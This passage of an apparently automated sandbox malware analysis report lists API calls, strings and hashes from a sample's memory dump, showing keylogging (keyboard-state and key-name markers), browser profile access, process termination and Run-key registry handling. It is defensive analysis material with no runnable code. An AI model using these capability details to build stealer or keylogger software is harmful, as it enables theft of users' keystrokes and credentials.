                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExistsFilePath
                                          • String ID: AppData$\Opera Software\Opera Stable\
                                          • API String ID: 1174141254-1629609700
                                          • Opcode ID: 966ad1c0b9db51bdb62c7854b74a1cb959393fa177e577b0bdfcd7534c47b356
                                          • Instruction ID: 695210f55460e2722832162fecb8267ed9c5d90cd61684e29202a639a57ef244
                                          • Opcode Fuzzy Hash: 966ad1c0b9db51bdb62c7854b74a1cb959393fa177e577b0bdfcd7534c47b356
                                          • Instruction Fuzzy Hash: 38F05E30A00219D6CA14BBB69C478EF7B2C9950755F1005BBBA01B21D3EE789941C6ED
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: _free
                                          • String ID: $G
                                          • API String ID: 269201875-4251033865
                                          • Opcode ID: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                          • Instruction ID: 5d396c1abc39b18bdc3e623667384c8b5cce6391ee106473ff554fc58991571d
                                          • Opcode Fuzzy Hash: c3cbfa58486471b9b0b5450975d814376b4bfcef5d9edc52bbd6be3dc13577df
                                          • Instruction Fuzzy Hash: 7CE0E532A0652041F675763B2D05A5B47C55FC2B3AF22033BF028861C1DFEC494A606E
                                          APIs
                                          • GetKeyState.USER32(00000011), ref: 0040B686
                                            • Part of subcall function 0040A41B: GetForegroundWindow.USER32(?,?,00475100), ref: 0040A451
                                            • Part of subcall function 0040A41B: GetWindowThreadProcessId.USER32(00000000,?), ref: 0040A45D
                                            • Part of subcall function 0040A41B: GetKeyboardLayout.USER32(00000000), ref: 0040A464
                                            • Part of subcall function 0040A41B: GetKeyState.USER32(00000010), ref: 0040A46E
                                            • Part of subcall function 0040A41B: GetKeyboardState.USER32(?,?,00475100), ref: 0040A479
                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(00475154,00000000,?,?,00000010,00000000,00000000), ref: 0040A49C
                                            • Part of subcall function 0040A41B: ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 0040A4FC
                                            • Part of subcall function 0040A671: SetEvent.KERNEL32(?,?,?,0040B86A,?,?,?,?,?,00000000), ref: 0040A69D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State$KeyboardUnicodeWindow$EventForegroundLayoutProcessThread
                                          • String ID: [AltL]$[AltR]
                                          • API String ID: 2738857842-2658077756
                                          • Opcode ID: 6a80a69b360d983d43fc671acba1cdd0286d48cffeca5b30a3a99feab9c297c2
                                          • Instruction ID: d407634c764e35d79823ffb94670adf82ecea3c262ef0a09b09082b5b6a355d5
                                          • Opcode Fuzzy Hash: 6a80a69b360d983d43fc671acba1cdd0286d48cffeca5b30a3a99feab9c297c2
                                          • Instruction Fuzzy Hash: B2E0652171032052C859363D592FABE2D11CB41B64B42097FF842AB7D6DABF4D5543CF
                                          APIs
                                          • ShellExecuteW.SHELL32(00000000,open,00000000,00000000,00000000,00000000), ref: 004161E3
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: ExecuteShell
                                          • String ID: !D@$open
                                          • API String ID: 587946157-1586967515
                                          • Opcode ID: eb4567e96d42521689c96e83ef1aa2a6a7df05ac31277aa5078135f6cb8d6bca
                                          • Instruction ID: 3b2857edeaddefe186f4a0a52e989bb70d7a4cfa1db765b6d796ce97600c5b03
                                          • Opcode Fuzzy Hash: eb4567e96d42521689c96e83ef1aa2a6a7df05ac31277aa5078135f6cb8d6bca
                                          • Instruction Fuzzy Hash: 4AE012712483059AD214EA72DC92EFEB35CAB54755F404C3FF506524E2EF3C5C49C66A
                                          APIs
                                          • GetKeyState.USER32(00000012), ref: 0040B6E0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.4476100610.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.4476085240.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476136774.0000000000459000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000471000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476158705.0000000000474000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.4476192590.0000000000478000.00000002.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_1732147507ac10953a908ae794c5ee180add9124a78c69705135688e502bb56ce4453d.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: State
                                          • String ID: [CtrlL]$[CtrlR]
                                          • API String ID: 1649606143-2446555240
                                          • Opcode ID: 68a21427a53fdb80c3da8a233085b44fd58d033cfb752835714686d39fb0ec3c
                                          • Instruction ID: b338140f060b4cc34328e336f8905ed3f99262ec5dadafe534bff25dd27afc5e
                                          • Opcode Fuzzy Hash: 68a21427a53fdb80c3da8a233085b44fd58d033cfb752835714686d39fb0ec3c
                                          • Instruction Fuzzy Hash: CFE04F2160072052C5243A7D561A67A2911C7C2764F41057BE9826B7C6DABE891452DF
                                          APIs
                                            • Part of subcall function 00449ADC: DeleteCriticalSection.KERNEL32(?,?,?,?,?,0046EB40,00000010,0043C225), ref: 00449B3E
                                            • Part of subcall function 00449ADC: _free.LIBCMT ref: 00449B4C
                                            • Part of subcall function 00449B7C: _free.LIBCMT ref: 00449B9E
                                          • DeleteCriticalSection.KERNEL32(00654C08), ref: 0043C241
                                          • _free.LIBCMT ref: 0043C255
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: _free$CriticalDeleteSection
                                          • String ID: (Le
                                          • API String ID: 1906768660-2819316628
                                          • Opcode ID: 63eb8731bacd2bc92b6a517d3705648d3868340f9125810a73be92756070acfe
                                          • Instruction ID: 53b3c8965ed62865b06495ab0c988fe80dbb580c75aaeb32feec7d00177b517a
                                          • Instruction Fuzzy Hash: F8E04F328145208FEB71BB69FD4595A73E4EB4D325B12086FF80DA3165CAADAC809B4D
                                          APIs
                                            • Part of subcall function 00434801: __onexit.LIBCMT ref: 00434807
                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: Init_thread_footer__onexit
                                          • String ID: <kG$@kG
                                          • API String ID: 1881088180-1261746286
                                          • Opcode ID: 3005333bcecaffa700c7528d759515cdbab9def11ce6217a52740adfeea124d5
                                          • Instruction ID: b3c290aa7aaf28965b2d5d57398085964b0ab7c4475a0d5935719b6e6c356165
                                          • Instruction Fuzzy Hash: 4BE0D8315049208AC510B75EE442AC53345DB0A324B21907BF414D72D2CBAE78C24E5D
                                          APIs
                                          • RegOpenKeyExW.ADVAPI32(80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00000000,00000002,?,80000002,80000002,0040D17F,00000000,004752E8,00475300,?,pth_unenc), ref: 00413A6C
                                          • RegDeleteValueW.ADVAPI32(?,?,?,pth_unenc), ref: 00413A80
                                          Strings
                                          • Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\, xrefs: 00413A6A
                                          Yara matches
                                          Similarity
                                          • API ID: DeleteOpenValue
                                          • String ID: Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\
                                          • API String ID: 2654517830-1051519024
                                          • Opcode ID: 37389d7ee51bec1c2129a7b253fd7a72f11d6a1cc032b6ab4e225ceb9c6d243b
                                          • Instruction ID: 8a242acd51d06e7ce72e997358fe7bb9804e2c240f13b939b69747d851efcbee
                                          • Instruction Fuzzy Hash: FFE0C231244208FBEF104FB1DD06FFA7B2CDB01F42F1006A9BA0692192C626CE049664
                                          APIs
                                          • TerminateProcess.KERNEL32(00000000,pth_unenc,0040F903), ref: 0041289B
                                          • WaitForSingleObject.KERNEL32(000000FF), ref: 004128AE
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: ObjectProcessSingleTerminateWait
                                          • String ID: pth_unenc
                                          • API String ID: 1872346434-4028850238
                                          • Opcode ID: d98377acd33bdda2349b7be151d0e491c89c80a6de05baeaae50e9a3ec635156
                                          • Instruction ID: 4cc810616d40180dbd1e9271652f71629269b6e9fac0605c61d014a2f2010889
                                          • Instruction Fuzzy Hash: B0D0C934189712EBD7220B70AE49B443A6CA705322F141360F429413F1C6A98894AA18
                                          APIs
                                          Strings
                                          Yara matches
                                          Similarity
                                          • API ID: CommandLine
                                          • String ID: 8(c
                                          • API String ID: 3253501508-1558180722
                                          • Opcode ID: 21ebb353eb9a5e230f63c7dd18cef58b922ecce08ae36afe23ca5bbaac6cd083
                                          • Instruction ID: 694146ce0b361bd31d1980ce40e18c0a636997d79f12e70286e675221abc8fda
                                          • Instruction Fuzzy Hash: CBB04878800753CB97108F21AA0C0853FA0B30820238020B6940A92A21EB7885868A08
                                          APIs
                                          • MultiByteToWideChar.KERNEL32(?,00000009,?,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000,00401BD9), ref: 00440D77
                                          • GetLastError.KERNEL32 ref: 00440D85
                                          • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00440DE0
                                          Yara matches
                                          Similarity
                                          • API ID: ByteCharMultiWide$ErrorLast
                                          • String ID:
                                          • API String ID: 1717984340-0
                                          • Opcode ID: b039ec4469df985fcedc89be96e173b9c6b75658958c27081834ba59c0289411
                                          • Instruction ID: 51be13377619d21db21fabe69686c0ed70cae26876ac5a8e773c252addda8789
                                          • Instruction Fuzzy Hash: 2D412670A00212AFEF218FA5C8447BBBBA4EF41310F2045AAFA59573E1DB399C31C759
                                          APIs
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411BC7
                                          • IsBadReadPtr.KERNEL32(?,00000014), ref: 00411C93
                                          • SetLastError.KERNEL32(0000007F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00411CB5
                                          • SetLastError.KERNEL32(0000007E,00411F2B), ref: 00411CCC
                                          Yara matches
                                          Similarity
                                          • API ID: ErrorLastRead
                                          • String ID:
                                          • API String ID: 4100373531-0
                                          • Opcode ID: 90639ee29dfdd48ecb3f8d3d3319bc7730bab7022ac74643829df8c5f46e8e60
                                          • Instruction ID: 65e884089caabfe283b2879acbb60db065d5dd9ad58be7743d127bf22715a70c
                                          • Instruction Fuzzy Hash: 60419D716443059FEB248F19DC84BA7B3E4FF44714F00082EEA4A876A1F738E845CB99